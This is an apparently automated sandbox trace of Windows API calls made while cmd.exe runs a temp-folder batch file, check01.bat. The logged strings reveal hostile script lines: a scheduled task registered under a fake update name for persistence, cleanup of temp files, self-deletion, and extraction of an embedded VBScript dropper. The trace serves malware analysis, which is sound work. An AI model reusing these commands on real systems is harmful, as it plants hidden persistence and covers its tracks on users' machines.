[0375.726] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2600, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa28
[0375.727] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^/S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}^ >> %temp%\\a.xml\r\n", cbMultiByte=94, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^/S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}^ >> %temp%\\a.xml\r\n %temp%\\a.xml\r\n") returned 94
[0375.727] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.727] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa28
[0375.727] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.727] GetFileType (hFile=0x5c) returned 0x1
[0375.727] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa28
[0375.727] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.727] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2632, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa48
[0375.727] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=32, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\n3-AB77-406B-9999-2A5D9D2F7FB7}^ >> %temp%\\a.xml\r\n") returned 32
[0375.728] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.728] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa48
[0375.728] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.728] GetFileType (hFile=0x5c) returned 0x1
[0375.728] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa48
[0375.728] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.728] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2667, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa6b
[0375.728] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=35, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nB77-406B-9999-2A5D9D2F7FB7}^ >> %temp%\\a.xml\r\n") returned 35
[0375.728] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.729] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6b
[0375.729] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.729] GetFileType (hFile=0x5c) returned 0x1
[0375.729] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6b
[0375.729] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.729] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2699, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa8b
[0375.729] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo ^ >> %temp%\\a.xml\r\n", cbMultiByte=32, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="echo ^ >> %temp%\\a.xml\r\nl\r\n") returned 32
[0375.729] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.729] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa8b
[0375.730] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.730] GetFileType (hFile=0x5c) returned 0x1
[0375.730] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa8b
[0375.730] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.730] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2777, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xad9
[0375.730] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="schtasks /Create /TN \\Update_AgentConfig_%USERNAME% /f /XML \"%temp%\\a.xml\"\r\n", cbMultiByte=78, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="schtasks /Create /TN \\Update_AgentConfig_%USERNAME% /f /XML \"%temp%\\a.xml\"\r\n> %temp%\\a.xml\r\n") returned 78
[0375.730] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.730] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xad9
[0375.731] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.731] GetFileType (hFile=0x5c) returned 0x1
[0375.731] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xad9
[0375.731] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.731] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2807, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xaf7
[0375.731] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="schtasks /Delete /TN \\Z11 /f\r\n", cbMultiByte=30, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="schtasks /Delete /TN \\Z11 /f\r\n_AgentConfig_%USERNAME% /f /XML \"%temp%\\a.xml\"\r\n") returned 30
[0375.731] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.731] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xaf7
[0375.732] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.732] GetFileType (hFile=0x5c) returned 0x1
[0375.732] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xaf7
[0375.732] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.732] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2829, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb0d
[0375.732] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="Del \"%TEMP%\\MMM.TMP\"\r\n", cbMultiByte=22, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="Del \"%TEMP%\\MMM.TMP\"\r\nZ11 /f\r\n") returned 22
[0375.732] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.732] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb0d
[0375.732] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.733] GetFileType (hFile=0x5c) returned 0x1
[0375.733] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb0d
[0375.733] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.733] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2851, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb23
[0375.733] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="Del \"%TEMP%\\TTT.TMP\"\r\n", cbMultiByte=22, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="Del \"%TEMP%\\TTT.TMP\"\r\n") returned 22
[0375.733] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.733] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb23
[0375.733] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.733] GetFileType (hFile=0x5c) returned 0x1
[0375.734] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb23
[0375.734] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.734] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2871, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb37
[0375.734] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="Del \"%temp%\\a.xml\"\r\n", cbMultiByte=20, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="Del \"%temp%\\a.xml\"\r\n\r\n") returned 20
[0375.734] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.734] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb37
[0375.734] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.734] GetFileType (hFile=0x5c) returned 0x1
[0375.734] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb37
[0375.735] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.735] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2893, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb4d
[0375.735] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="Del \"%temp%\\Z11.xml\"\r\n", cbMultiByte=22, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="Del \"%temp%\\Z11.xml\"\r\n") returned 22
[0375.735] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.735] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb4d
[0375.735] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.735] GetFileType (hFile=0x5c) returned 0x1
[0375.735] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb4d
[0375.736] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.736] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2919, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb67
[0375.736] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="Del \"%temp%\\check01.txt\"\r\n", cbMultiByte=26, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="Del \"%temp%\\check01.txt\"\r\n/f\r\n") returned 26
[0375.736] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.736] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb67
[0375.736] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.736] GetFileType (hFile=0x5c) returned 0x1
[0375.736] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb67
[0375.736] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.737] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2946, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb82
[0375.737] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="(goto) 2>nul & del \"%~f0\"\r\n", cbMultiByte=27, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="(goto) 2>nul & del \"%~f0\"\r\nf\r\n") returned 27
[0375.737] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.737] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb82
[0375.737] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.737] GetFileType (hFile=0x5c) returned 0x1
[0375.737] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb82
[0375.738] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.738] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2956, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb8c
[0375.738] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="endlocal\r\n", cbMultiByte=10, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="endlocal\r\nul & del \"%~f0\"\r\n") returned 10
[0375.738] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.738] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb8c
[0375.738] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.738] GetFileType (hFile=0x5c) returned 0x1
[0375.739] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb8c
[0375.739] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.739] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2965, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb95
[0375.739] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="exit /b\r\n", cbMultiByte=9, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="exit /b\r\n\n") returned 9
[0375.739] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.739] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb95
[0375.739] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.739] GetFileType (hFile=0x5c) returned 0x1
[0375.739] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb95
[0375.740] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.740] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2967, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xb97
[0375.740] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr="\r\nit /b\r\n") returned 2
[0375.740] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.740] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb97
[0375.740] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.740] GetFileType (hFile=0x5c) returned 0x1
[0375.740] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xb97
[0375.741] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee840, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1ee840*=0x200, lpOverlapped=0x0) returned 1
[0375.741] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2978, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xba2
[0375.741] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":writeHex\r\n", cbMultiByte=11, lpWideCharStr=0x4a287b60, cchWideChar=512 | out: lpWideCharStr=":writeHex\r\nl & del \"%~f0\"\r\n") returned 11
[0375.741] _close (_FileHandle=3) returned 0
[0375.741] _get_osfhandle (_FileHandle=1) returned 0x7
[0375.741] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0375.742] _get_osfhandle (_FileHandle=1) returned 0x7
[0375.742] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a27e194 | out: lpMode=0x4a27e194) returned 1
[0375.743] _get_osfhandle (_FileHandle=0) returned 0x3
[0375.743] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a27e198 | out: lpMode=0x4a27e198) returned 1
[0375.743] SetConsoleInputExeNameW () returned 0x1
[0375.743] GetConsoleOutputCP () returned 0x1b5
[0375.744] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a28bfe0 | out: lpCPInfo=0x4a28bfe0) returned 1
[0375.744] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0375.744] CreateFileW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\check01.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1eef28, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c
[0375.744] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3
[0375.744] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.745] SetFilePointer (in: hFile=0x5c, lDistanceToMove=2978, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xba2
[0375.745] GetProcessHeap () returned 0x200000
[0375.745] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x216cf0 | out: hHeap=0x200000) returned 1
[0375.745] GetProcessHeap () returned 0x200000
[0375.745] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b120 | out: hHeap=0x200000) returned 1
[0375.745] GetProcessHeap () returned 0x200000
[0375.746] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b0f0 | out: hHeap=0x200000) returned 1
[0375.746] GetProcessHeap () returned 0x200000
[0375.746] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21b090 | out: hHeap=0x200000) returned 1
[0375.746] GetProcessHeap () returned 0x200000
[0375.746] HeapFree (in: hHeap=0x200000, dwFlags=0x0, lpMem=0x21cd90 | out: hHeap=0x200000) returned 1
[0375.747] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.747] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xba2
[0375.747] ReadFile (in: hFile=0x5c, lpBuffer=0x4a28c320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x1eed30, lpOverlapped=0x0 | out: lpBuffer=0x4a28c320*, lpNumberOfBytesRead=0x1eed30*=0x390, lpOverlapped=0x0) returned 1
[0375.747] SetFilePointer (in: hFile=0x5c, lDistanceToMove=3038, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xbde
[0375.747] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=" findstr /r \"^[^a-z]*:::\" \"%~f0\" >\"%temp%\\writebin.vbs\"\r\n", cbMultiByte=60, lpWideCharStr=0x4a28e320, cchWideChar=8191 | out: lpWideCharStr=" findstr /r \"^[^a-z]*:::\" \"%~f0\" >\"%temp%\\writebin.vbs\"\r\n") returned 60
[0375.747] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.747] GetFileType (hFile=0x5c) returned 0x1
[0375.747] _get_osfhandle (_FileHandle=3) returned 0x5c
[0375.747] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xbde
[0375.748] GetProcessHeap () returned 0x200000
[0375.748] RtlAllocateHeap (HeapHandle=0x200000, Flags=0x8, Size=0x4012) returned 0x22a820
[0375.749] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", nBufferLength=0x208, lpBuffer=0x1ee840, lpFilePart=0x1ee3b0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\check01.bat", lpFilePart=0x1ee3b0*="check01.bat") returned 0x30
[0375.749] FindFirstFileW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), lpFindFileData=0x1ee0e0 | out: lpFindFileData=0x1ee0e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x3ff, cFileName="Users", cAlternateFileName="")) returned 0x22e840
[0375.749] FindClose (in: hFindFile=0x22e840 | out: hFindFile=0x22e840) returned 1
[0375.749] memcpy (in: _Dst=0x1ee846, _Src=0x1ee10c, _Size=0xa | out: _Dst=0x1ee846) returned 0x1ee846
[0375.749] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x1ee0e0 | out: lpFindFileData=0x1ee0e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x3ff, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x22e840
[0375.749] FindClose (in: hFindFile=0x22e840 | out: hFindFile=0x22e840) returned 1
[0375.750] _wcsnicmp (_String1="KEECFM~1", _String2="KEECFM~1", _MaxCount=0x8) returned 0
[0375.750] _wcsicmp (_String1="kEecfMwgj", _String2="KEECFM~1") returned -7
[0375.750] memcpy (in: _Dst=0x1ee852, _Src=0x1ee314, _Size=0x10 | out: _Dst=0x1ee852) returned 0x1ee852
[0375.750] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x1ee0e0 | out: lpFindFileData=0x1ee0e0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x3ff, cFileName="AppData", cAlternateFileName="")) returned 0x22e840
[0375.750] FindClose (in: hFindFile=0x22e840 | out: hFindFile=0x22e840) returned 1
[0375.750] memcpy (in: _Dst=0x1ee864, _Src=0x1ee10c, _Size=0xe | out: _Dst=0x1ee864) returned 0x1ee864
[0375.750] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x1ee0e0 | out: lpFindFileData=0x1ee0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x495cf440, ftLastAccessTime.dwHighDateTime=0x1dab598, ftLastWriteTime.dwLowDateTime=0x495cf440, ftLastWriteTime.dwHighDateTime=0x1dab598, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x3ff, cFileName="Local", cAlternateFileName="")) returned 0x22e840
[0375.751] FindClose (in: hFindFile=0x22e840 | out: hFindFile=0x22e840) returned 1
[0375.751] memcpy (in: _Dst=0x1ee874, _Src=0x1ee10c, _Size=0xa | out: _Dst=0x1ee874) returned 0x1ee874
